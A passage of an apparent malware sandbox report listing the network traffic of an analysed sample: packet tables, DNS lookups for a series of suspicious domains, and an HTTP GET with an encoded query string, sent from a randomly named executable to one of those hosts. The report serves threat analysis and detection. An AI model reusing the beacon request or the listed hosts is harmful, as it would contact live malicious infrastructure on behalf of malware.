Nov 24, 2024 08:31:00.648277998 CET	80	50012	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:00.648334980 CET	50012	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:01.591119051 CET	50013	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:01.710896969 CET	80	50013	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:01.712651014 CET	50013	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:01.862689018 CET	50013	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:01.982405901 CET	80	50013	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:03.338793039 CET	80	50013	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:03.338823080 CET	80	50013	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:03.338902950 CET	50013	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:03.406506062 CET	50013	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:04.424973011 CET	50015	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:04.544776917 CET	80	50015	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:04.544925928 CET	50015	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:04.657820940 CET	50015	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:04.777508020 CET	80	50015	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:04.777549028 CET	80	50015	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:06.169311047 CET	50015	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:06.289179087 CET	80	50015	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:06.289849997 CET	50015	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:07.191679001 CET	50016	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:07.312402964 CET	80	50016	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:07.312519073 CET	50016	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:07.333631992 CET	50016	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:07.453279972 CET	80	50016	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:08.890268087 CET	80	50016	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:08.890357971 CET	80	50016	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:08.890513897 CET	50016	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:08.893590927 CET	50016	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:09.013071060 CET	80	50016	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:14.676497936 CET	50017	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:14.796274900 CET	80	50017	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:14.796399117 CET	50017	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:14.815524101 CET	50017	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:14.935607910 CET	80	50017	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:16.001800060 CET	80	50017	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:16.001908064 CET	50017	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:16.327570915 CET	50017	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:16.447221041 CET	80	50017	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:17.344297886 CET	50018	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:17.464056015 CET	80	50018	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:17.467137098 CET	50018	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:17.483016014 CET	50018	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:17.603005886 CET	80	50018	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:18.678205967 CET	80	50018	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:18.678256035 CET	50018	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:19.105875015 CET	50018	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:19.225435972 CET	80	50018	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:20.116086960 CET	50019	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:20.235604048 CET	80	50019	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:20.236466885 CET	50019	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:20.256548882 CET	50019	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:20.376132965 CET	80	50019	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:20.376616001 CET	80	50019	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:21.446060896 CET	80	50019	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:21.447020054 CET	50019	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:21.798319101 CET	50019	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:21.917798996 CET	80	50019	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:22.816850901 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:22.937042952 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:22.937148094 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:22.947807074 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:23.069324017 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.777152061 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.777232885 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.777288914 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.777324915 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.777359009 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.777384996 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:24.777384996 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:24.822173119 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.822277069 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:24.822354078 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.822391033 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.822467089 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.822489023 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:24.822520018 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.822607994 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:24.897108078 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.897172928 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.897301912 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:24.901195049 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.978578091 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.978672981 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.978683949 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:24.982527018 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.982656002 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:24.984430075 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:24.984530926 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:24.987175941 CET	50020	80	192.168.2.6	208.91.197.39
Nov 24, 2024 08:31:25.106720924 CET	80	50020	208.91.197.39	192.168.2.6
Nov 24, 2024 08:31:30.418977022 CET	50021	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:30.538650990 CET	80	50021	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:30.538736105 CET	50021	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:30.559228897 CET	50021	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:30.678750992 CET	80	50021	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:32.076607943 CET	50021	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:32.084897995 CET	80	50021	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:32.085052967 CET	50021	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:32.085139990 CET	80	50021	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:32.085212946 CET	50021	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:32.196218014 CET	80	50021	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:32.196361065 CET	50021	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:33.095822096 CET	50022	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:33.215399027 CET	80	50022	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:33.215596914 CET	50022	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:33.231410027 CET	50022	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:33.350930929 CET	80	50022	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:34.743810892 CET	80	50022	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:34.743980885 CET	80	50022	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:34.744024038 CET	50022	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:34.747399092 CET	50022	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:35.766664982 CET	50023	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:35.936824083 CET	80	50023	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:35.937633038 CET	50023	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:35.953391075 CET	50023	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:36.073148012 CET	80	50023	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:36.078649044 CET	80	50023	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:37.466202974 CET	50023	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:37.506993055 CET	80	50023	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:37.508723021 CET	50023	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:37.586226940 CET	80	50023	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:37.586366892 CET	50023	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:38.487258911 CET	50024	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:38.606875896 CET	80	50024	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:38.606956005 CET	50024	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:38.619323969 CET	50024	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:38.738982916 CET	80	50024	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:40.133333921 CET	80	50024	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:40.133389950 CET	80	50024	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:40.136142015 CET	50024	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:40.139034986 CET	50024	80	192.168.2.6	43.205.198.29
Nov 24, 2024 08:31:40.258512974 CET	80	50024	43.205.198.29	192.168.2.6
Nov 24, 2024 08:31:45.493258953 CET	50025	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:45.612976074 CET	80	50025	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:45.616759062 CET	50025	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:45.632940054 CET	50025	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:45.752499104 CET	80	50025	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:47.138015985 CET	50025	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:47.257930994 CET	80	50025	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:47.257987976 CET	50025	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:48.157902002 CET	50026	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:48.277379990 CET	80	50026	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:48.278983116 CET	50026	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:48.302864075 CET	50026	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:48.422418118 CET	80	50026	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:49.810767889 CET	50026	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:49.930684090 CET	80	50026	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:49.930798054 CET	50026	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:50.831435919 CET	50027	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:50.950926065 CET	80	50027	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:50.951005936 CET	50027	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:50.972776890 CET	50027	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:51.092258930 CET	80	50027	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:51.092372894 CET	80	50027	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:52.481857061 CET	50027	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:52.601778984 CET	80	50027	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:52.601857901 CET	50027	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:53.504697084 CET	50028	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:53.624288082 CET	80	50028	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:53.624648094 CET	50028	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:53.636650085 CET	50028	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:53.756179094 CET	80	50028	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:55.587796926 CET	80	50028	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:55.587873936 CET	80	50028	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:55.588237047 CET	80	50028	104.21.40.167	192.168.2.6
Nov 24, 2024 08:31:55.588246107 CET	50028	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:55.588293076 CET	50028	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:56.531371117 CET	50028	80	192.168.2.6	104.21.40.167
Nov 24, 2024 08:31:56.650834084 CET	80	50028	104.21.40.167	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 08:28:31.009088039 CET	54161	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:28:32.012629986 CET	54161	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:28:32.564424992 CET	53	54161	1.1.1.1	192.168.2.6
Nov 24, 2024 08:28:32.564435959 CET	53	54161	1.1.1.1	192.168.2.6
Nov 24, 2024 08:28:49.328481913 CET	53360	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:28:50.078439951 CET	53	53360	1.1.1.1	192.168.2.6
Nov 24, 2024 08:29:04.376280069 CET	59242	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:29:04.929321051 CET	53	59242	1.1.1.1	192.168.2.6
Nov 24, 2024 08:29:19.408166885 CET	53822	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:29:19.948117018 CET	53	53822	1.1.1.1	192.168.2.6
Nov 24, 2024 08:29:34.486474037 CET	58669	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:29:35.009593964 CET	53	58669	1.1.1.1	192.168.2.6
Nov 24, 2024 08:29:49.516719103 CET	55552	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:29:50.512890100 CET	55552	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:29:51.516212940 CET	55552	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:29:52.295289040 CET	53	55552	1.1.1.1	192.168.2.6
Nov 24, 2024 08:29:52.295327902 CET	53	55552	1.1.1.1	192.168.2.6
Nov 24, 2024 08:29:52.295346022 CET	53	55552	1.1.1.1	192.168.2.6
Nov 24, 2024 08:30:07.107534885 CET	49625	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:30:07.528328896 CET	53	49625	1.1.1.1	192.168.2.6
Nov 24, 2024 08:30:42.688889027 CET	52941	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:30:43.407790899 CET	53	52941	1.1.1.1	192.168.2.6
Nov 24, 2024 08:30:58.176542997 CET	53647	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:30:58.880775928 CET	53	53647	1.1.1.1	192.168.2.6
Nov 24, 2024 08:31:13.909092903 CET	49396	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:31:14.673387051 CET	53	49396	1.1.1.1	192.168.2.6
Nov 24, 2024 08:31:30.002654076 CET	63774	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:31:30.398569107 CET	53	63774	1.1.1.1	192.168.2.6
Nov 24, 2024 08:31:45.158169985 CET	61181	53	192.168.2.6	1.1.1.1
Nov 24, 2024 08:31:45.487281084 CET	53	61181	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 24, 2024 08:28:31.009088039 CET	192.168.2.6	1.1.1.1	0x5179	Standard query (0)	www.thaor56.online	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:28:32.012629986 CET	192.168.2.6	1.1.1.1	0x5179	Standard query (0)	www.thaor56.online	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:28:49.328481913 CET	192.168.2.6	1.1.1.1	0xbefb	Standard query (0)	www.optimismbank.xyz	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:04.376280069 CET	192.168.2.6	1.1.1.1	0x6d70	Standard query (0)	www.greenthub.life	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:19.408166885 CET	192.168.2.6	1.1.1.1	0x6ccf	Standard query (0)	www.laohub10.net	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:34.486474037 CET	192.168.2.6	1.1.1.1	0xe485	Standard query (0)	www.bankseedz.info	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:49.516719103 CET	192.168.2.6	1.1.1.1	0x69	Standard query (0)	www.madhf.tech	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:50.512890100 CET	192.168.2.6	1.1.1.1	0x69	Standard query (0)	www.madhf.tech	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:51.516212940 CET	192.168.2.6	1.1.1.1	0x69	Standard query (0)	www.madhf.tech	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:30:07.107534885 CET	192.168.2.6	1.1.1.1	0xdcd7	Standard query (0)	www.xcvbj.asia	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:30:42.688889027 CET	192.168.2.6	1.1.1.1	0x24d5	Standard query (0)	www.yc791022.asia	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:30:58.176542997 CET	192.168.2.6	1.1.1.1	0x7e8d	Standard query (0)	www.43kdd.top	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:31:13.909092903 CET	192.168.2.6	1.1.1.1	0x7784	Standard query (0)	www.jcsa.info	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:31:30.002654076 CET	192.168.2.6	1.1.1.1	0x1c44	Standard query (0)	www.1secondlending.one	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:31:45.158169985 CET	192.168.2.6	1.1.1.1	0x7d7a	Standard query (0)	www.zkdamdjj.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 24, 2024 08:28:32.564424992 CET	1.1.1.1	192.168.2.6	0x5179	No error (0)	www.thaor56.online	thaor56.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:28:32.564424992 CET	1.1.1.1	192.168.2.6	0x5179	No error (0)	thaor56.online		202.92.5.23	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:28:32.564435959 CET	1.1.1.1	192.168.2.6	0x5179	No error (0)	www.thaor56.online	thaor56.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:28:32.564435959 CET	1.1.1.1	192.168.2.6	0x5179	No error (0)	thaor56.online		202.92.5.23	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:28:50.078439951 CET	1.1.1.1	192.168.2.6	0xbefb	No error (0)	www.optimismbank.xyz		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:28:50.078439951 CET	1.1.1.1	192.168.2.6	0xbefb	No error (0)	www.optimismbank.xyz		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:04.929321051 CET	1.1.1.1	192.168.2.6	0x6d70	No error (0)	www.greenthub.life		209.74.77.109	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:19.948117018 CET	1.1.1.1	192.168.2.6	0x6ccf	No error (0)	www.laohub10.net	r0lqcud7.nbnnn.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:29:19.948117018 CET	1.1.1.1	192.168.2.6	0x6ccf	No error (0)	r0lqcud7.nbnnn.xyz		23.225.160.132	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:19.948117018 CET	1.1.1.1	192.168.2.6	0x6ccf	No error (0)	r0lqcud7.nbnnn.xyz		27.124.4.246	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:19.948117018 CET	1.1.1.1	192.168.2.6	0x6ccf	No error (0)	r0lqcud7.nbnnn.xyz		202.79.161.151	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:35.009593964 CET	1.1.1.1	192.168.2.6	0xe485	No error (0)	www.bankseedz.info		46.30.211.38	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:52.295289040 CET	1.1.1.1	192.168.2.6	0x69	No error (0)	www.madhf.tech		103.224.182.242	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:52.295327902 CET	1.1.1.1	192.168.2.6	0x69	No error (0)	www.madhf.tech		103.224.182.242	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:29:52.295346022 CET	1.1.1.1	192.168.2.6	0x69	No error (0)	www.madhf.tech		103.224.182.242	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:30:07.528328896 CET	1.1.1.1	192.168.2.6	0xdcd7	No error (0)	www.xcvbj.asia		149.88.81.190	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:30:43.407790899 CET	1.1.1.1	192.168.2.6	0x24d5	No error (0)	www.yc791022.asia		101.35.209.183	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:30:58.880775928 CET	1.1.1.1	192.168.2.6	0x7e8d	No error (0)	www.43kdd.top	43kdd.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:30:58.880775928 CET	1.1.1.1	192.168.2.6	0x7e8d	No error (0)	43kdd.top		38.47.232.202	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:31:14.673387051 CET	1.1.1.1	192.168.2.6	0x7784	No error (0)	www.jcsa.info		208.91.197.39	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:31:30.398569107 CET	1.1.1.1	192.168.2.6	0x1c44	No error (0)	www.1secondlending.one		43.205.198.29	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:31:45.487281084 CET	1.1.1.1	192.168.2.6	0x7d7a	No error (0)	www.zkdamdjj.shop		104.21.40.167	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:31:45.487281084 CET	1.1.1.1	192.168.2.6	0x7d7a	No error (0)	www.zkdamdjj.shop		172.67.187.114	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.thaor56.online

www.optimismbank.xyz

www.greenthub.life

www.laohub10.net

www.bankseedz.info

www.madhf.tech

www.xcvbj.asia

www.yc791022.asia

www.43kdd.top

www.jcsa.info

www.1secondlending.one

www.zkdamdjj.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49790	202.92.5.23	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:28:32.702631950 CET	517	OUT	GET /fev0/?s8q=0RJLtN5PAfjxwlrp&ftMDw=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKpfTM6+zZhK0Vfjoc5PqIe4votSjOaPjz9cBe2KS72Lx57OWhQ20= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close Host: www.thaor56.online User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Nov 24, 2024 08:28:34.269078016 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sun, 24 Nov 2024 07:28:33 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Nov 24, 2024 08:28:34.269093037 CET	234	IN	Data Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49830	13.248.169.48	80	5956	C:\Program Files (x86)\pwxFLTOfMixYhCYeBBHixBIAaSvduDZDxcCqFiDbXbsFZfmDenbyfXwNBSHfiakgXIMkKEkilhS\XQNtOWkQlf.exe

Timestamp	Bytes transferred	Direction	Data
